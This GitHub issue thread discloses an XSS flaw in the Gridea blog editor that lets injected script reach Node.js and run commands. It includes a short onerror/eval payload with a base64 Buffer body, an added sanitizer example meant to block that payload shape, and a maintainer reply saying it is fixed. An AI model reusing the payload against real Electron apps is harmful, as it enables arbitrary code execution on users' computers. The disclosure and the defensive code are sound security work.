Vulnerability: XSS to RCE #105

Closed
0x2E opened this issue May 13, 2019 · 4 comments

Comments

0x2E commented May 13, 2019

Hi, I found an XSS vulnerability that can cause RCE.
And I recorded a GIF to demonstrate controlling the local win10 through this vulnerability.

Cause of vulnerability

The post content editing area does not filter or prevent JS scripts from running, so XSS can be used to call Node.js modules (for example, child_process.exec()) to achieve arbitrary code execution. If the user imports content containing malicious code, the vulnerability is triggered.

Payload

<img src=# onerror='eval(new Buffer(`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`,`base64`).toString())'>
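
A defensive counterpart to the report above, added here as an example and not taken from Gridea or the reporter: an allowlist filter for the HTML a Markdown renderer hands to an Electron preview pane, sitting next to the primary fix of keeping Node integration off and context isolation on for the renderer. The tag and attribute allowlists, and the assumption that the preview receives plain renderer HTML, are illustrative choices of this example.

```javascript
// Added example, not Gridea's own code: an allowlist filter for the HTML that a
// Markdown renderer hands to an Electron preview pane. Defence in depth next to
// the primary fix (nodeIntegration: false, contextIsolation: true on the
// BrowserWindow), which takes require()/child_process out of the page's reach.
const ALLOWED_TAGS = new Set(['p', 'a', 'img', 'em', 'strong', 'code', 'pre',
  'ul', 'ol', 'li', 'h1', 'h2', 'h3', 'blockquote', 'br']);
// on* handlers are never listed, so the `<img src=# onerror=...>` shape from
// the report keeps its src and loses its handler.
const ALLOWED_ATTRS = { a: ['href', 'title'], img: ['src', 'alt', 'title'] };
const URL_ATTRS = new Set(['href', 'src']);
// A well-formed tag: `<`, optional `/`, name, quoted or bare attributes, `>`.
// Anything that does not match is escaped as text, so odd markup fails closed.
const TAG_RE = /<(\/?)([a-zA-Z][\w-]*)((?:\s+[^\s"'>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'=<>`]+))?)*)\s*\/?>/g;
const ATTR_RE = /([^\s"'>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?/g;
// Escape text nodes and attribute values; well-formed entities are left alone.
function escapeText(s) {
  return s.replace(/&(?!(?:#\d+|#x[0-9a-f]+|[a-z]+);)/gi, '&amp;')
    .replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Keep a URL only if it is relative or http(s). Control characters and entity
// escapes are rejected rather than decoded (this also rejects `&amp;` in query
// strings), which covers the `java&#x09;script:` family without a decoder.
function isSafeUrl(v) {
  if (/[\u0000-\u001f\u007f]|&#?\w+;/.test(v)) return false;
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(v.trim());
  return !m || /^https?$/i.test(m[1]);
}
function sanitizePreview(html) {
  let out = '', last = 0, m;
  TAG_RE.lastIndex = 0;
  while ((m = TAG_RE.exec(html)) !== null) {
    out += escapeText(html.slice(last, m.index)); // text between tags
    last = TAG_RE.lastIndex;
    const name = m[2].toLowerCase();
    if (!ALLOWED_TAGS.has(name)) continue;        // unknown tag: dropped whole
    if (m[1]) { out += `</${name}>`; continue; }  // closing tag
    let attrs = '', a;
    ATTR_RE.lastIndex = 0;
    while ((a = ATTR_RE.exec(m[3])) !== null) {
      const key = a[1].toLowerCase();
      const val = a[2] || a[3] || a[4] || '';
      if (!(ALLOWED_ATTRS[name] || []).includes(key)) continue;
      if (URL_ATTRS.has(key) && !isSafeUrl(val)) continue;
      attrs += ` ${key}="${escapeText(val)}"`;
    }
    out += `<${name}${attrs}>`;
  }
  return out + escapeText(html.slice(last));
}
```

In production a maintained sanitizer such as DOMPurify should replace the hand-written tokenizer; the Electron-side settings remain the part that actually removes the Node reach.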
EryouHao commented May 14, 2019

In this regard, I think the users of Gridea are the users themselves, and the Markdown content in the article is also written by the users themselves. Therefore, most users know what they are writing and will not attack themselves, will they?

Please correct me if my understanding is wrong.

0x2E commented May 14, 2019

You are right, users do not attack themselves actively, so the probability of using this vulnerability is low.

My hypothetical scenario is that when a user inadvertently includes, or is induced to include, malicious code in the editor (such as by quoting someone else's article), they may not notice the malicious code in their content and may simply try to preview it; then I have executed the code I need on their OS.

@muze-page

Not impossible.

@EryouHao

fixed
